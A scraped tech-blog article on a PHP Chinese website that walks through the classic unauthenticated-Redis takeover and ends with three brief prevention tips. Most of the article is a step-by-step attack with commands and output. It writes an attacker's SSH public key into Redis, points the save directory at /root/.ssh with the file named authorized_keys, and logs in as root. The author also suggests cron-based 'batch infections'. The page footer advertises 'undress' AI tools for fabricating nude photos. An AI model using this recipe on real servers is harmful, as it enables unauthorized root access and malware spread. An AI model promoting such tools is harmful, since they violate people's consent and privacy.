Home Database Redis A brief analysis of the principles of Redis mining and how to prevent it (skill sharing)

A brief analysis of the principles of Redis mining and how to prevent it (skill sharing)

Jan 11, 2022 pm 06:49 PM
redis Mining prevention

This article will talk about the principles of Redis mining, see how to prevent it, and share prevention techniques. I hope it will be helpful to everyone!

A brief analysis of the principles of Redis mining and how to prevent it (skill sharing)

The author has also been attacked by a mining virus, which was very uncomfortable, but in fact, as long as you understand the means of intrusion, it is very easy to prevent it. Today we will demonstrate how to pass Redis performs privilege escalation to obtain the Root user of the remote server. [Related recommendations: Redis Video Tutorial]

1. First we need some prerequisites

  • Condition 1: You First, there must be a Redis, and we must know its port [default 6379];

  • Condition 2: The password of Redis cannot be too complex, or there is no password;

  • Condition 3: The user who starts Redis is preferably a Root user, which will be more destructive;

2. Start making trouble

  • 2.1 Create a pair of secret keys

Generate a pair through ssh-keygen. Of course, you can use the existing ones without any problem.

root@kali:/usr/local/src# ssh-keygen 
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa
Copy after login

Next, the attack key value is generated through the public key.

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
Copy after login

The content is as follows

root@kali:/tmp/rediskey# cat foo.txt 

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
Copy after login

The purpose of adding two newlines before and after here is to prevent the data from being connected together and causing failure problems.

  • 2.2 Configure Key to Redis

The operation is as follows:

root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar
OK
Copy after login

Log in to Redis to check whether it has been written into Redis.

root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
192.168.243.129:6379> get bar
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
Copy after login
  • 2.3 Replace system files through the Redis saving mechanism

Let’s see the following operations

192.168.243.129:6379> config set dir /root/.ssh
OK
192.168.243.129:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.243.129:6379> config set dbfilename "authorized_keys"
OK
192.168.243.129:6379> save
OK
192.168.243.129:6379> exit
Copy after login

At this time, we log in remotely Check the effect on the host.

root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.
ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.
Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64

Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
root@kali:~# w
Copy after login

OK, we have successfully escalated our rights here, so let’s take a look at what the exported file is? In fact, it is just the saved file form of Redis. If you are interested, you can open it yourself and have a look. It will not be shown here.

3. How to prevent

This vulnerability is quite powerful. We only have one host permission now, add it to the scheduled task to execute some scripts, and then What about batch infections?

Tips for prevention are as follows:

  • Redis should not listen on dangerous IPs. If so, please add firewall control;

  • Redis must increase password restrictions, and it cannot be a weak password;

  • Try not to start Redis as the Root user.

Follow the above three points to prevent Redis mining, no problem

For more programming-related knowledge, please visit:Introduction to Programming! !

The above is the detailed content of A brief analysis of the principles of Redis mining and how to prevent it (skill sharing). For more information, please follow other related articles on the PHP Chinese website!

Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

AI Hentai Generator

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)
2 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island Adventure: How To Get Giant Seeds
1 months ago By 尊渡假赌尊渡假赌尊渡假赌
Two Point Museum: All Exhibits And Where To Find Them
1 months ago By 尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Solution to 0x80242008 error when installing Windows 11 10.0.22000.100 Solution to 0x80242008 error when installing Windows 11 10.0.22000.100 May 08, 2024 pm 03:50 PM

1. Start the [Start] menu, enter [cmd], right-click [Command Prompt], and select Run as [Administrator]. 2. Enter the following commands in sequence (copy and paste carefully): SCconfigwuauservstart=auto, press Enter SCconfigbitsstart=auto, press Enter SCconfigcryptsvcstart=auto, press Enter SCconfigtrustedinstallerstart=auto, press Enter SCconfigwuauservtype=share, press Enter netstopwuauserv , press enter netstopcryptS

Golang API caching strategy and optimization Golang API caching strategy and optimization May 07, 2024 pm 02:12 PM

The caching strategy in GolangAPI can improve performance and reduce server load. Commonly used strategies are: LRU, LFU, FIFO and TTL. Optimization techniques include selecting appropriate cache storage, hierarchical caching, invalidation management, and monitoring and tuning. In the practical case, the LRU cache is used to optimize the API for obtaining user information from the database. The data can be quickly retrieved from the cache. Otherwise, the cache can be updated after obtaining it from the database.

Caching mechanism and application practice in PHP development Caching mechanism and application practice in PHP development May 09, 2024 pm 01:30 PM

In PHP development, the caching mechanism improves performance by temporarily storing frequently accessed data in memory or disk, thereby reducing the number of database accesses. Cache types mainly include memory, file and database cache. Caching can be implemented in PHP using built-in functions or third-party libraries, such as cache_get() and Memcache. Common practical applications include caching database query results to optimize query performance and caching page output to speed up rendering. The caching mechanism effectively improves website response speed, enhances user experience and reduces server load.

How to upgrade Win11 English 21996 to Simplified Chinese 22000_How to upgrade Win11 English 21996 to Simplified Chinese 22000 How to upgrade Win11 English 21996 to Simplified Chinese 22000_How to upgrade Win11 English 21996 to Simplified Chinese 22000 May 08, 2024 pm 05:10 PM

First you need to set the system language to Simplified Chinese display and restart. Of course, if you have changed the display language to Simplified Chinese before, you can just skip this step. Next, start operating the registry, regedit.exe, directly navigate to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlNlsLanguage in the left navigation bar or the upper address bar, and then modify the InstallLanguage key value and Default key value to 0804 (if you want to change it to English en-us, you need First set the system display language to en-us, restart the system and then change everything to 0409) You must restart the system at this point.

How to use Redis cache in PHP array pagination? How to use Redis cache in PHP array pagination? May 01, 2024 am 10:48 AM

Using Redis cache can greatly optimize the performance of PHP array paging. This can be achieved through the following steps: Install the Redis client. Connect to the Redis server. Create cache data and store each page of data into a Redis hash with the key "page:{page_number}". Get data from cache and avoid expensive operations on large arrays.

How to find the update file downloaded by Win11_Share the location of the update file downloaded by Win11 How to find the update file downloaded by Win11_Share the location of the update file downloaded by Win11 May 08, 2024 am 10:34 AM

1. First, double-click the [This PC] icon on the desktop to open it. 2. Then double-click the left mouse button to enter [C drive]. System files will generally be automatically stored in C drive. 3. Then find the [windows] folder in the C drive and double-click to enter. 4. After entering the [windows] folder, find the [SoftwareDistribution] folder. 5. After entering, find the [download] folder, which contains all win11 download and update files. 6. If we want to delete these files, just delete them directly in this folder.

PHP Redis caching applications and best practices PHP Redis caching applications and best practices May 04, 2024 am 08:33 AM

Redis is a high-performance key-value cache. The PHPRedis extension provides an API to interact with the Redis server. Use the following steps to connect to Redis, store and retrieve data: Connect: Use the Redis classes to connect to the server. Storage: Use the set method to set key-value pairs. Retrieval: Use the get method to obtain the value of the key.

How to optimize function performance for different PHP versions? How to optimize function performance for different PHP versions? Apr 25, 2024 pm 03:03 PM

Methods to optimize function performance for different PHP versions include: using analysis tools to identify function bottlenecks; enabling opcode caching or using an external caching system; adding type annotations to improve performance; and selecting appropriate string concatenation and sorting algorithms according to the PHP version.

See all articles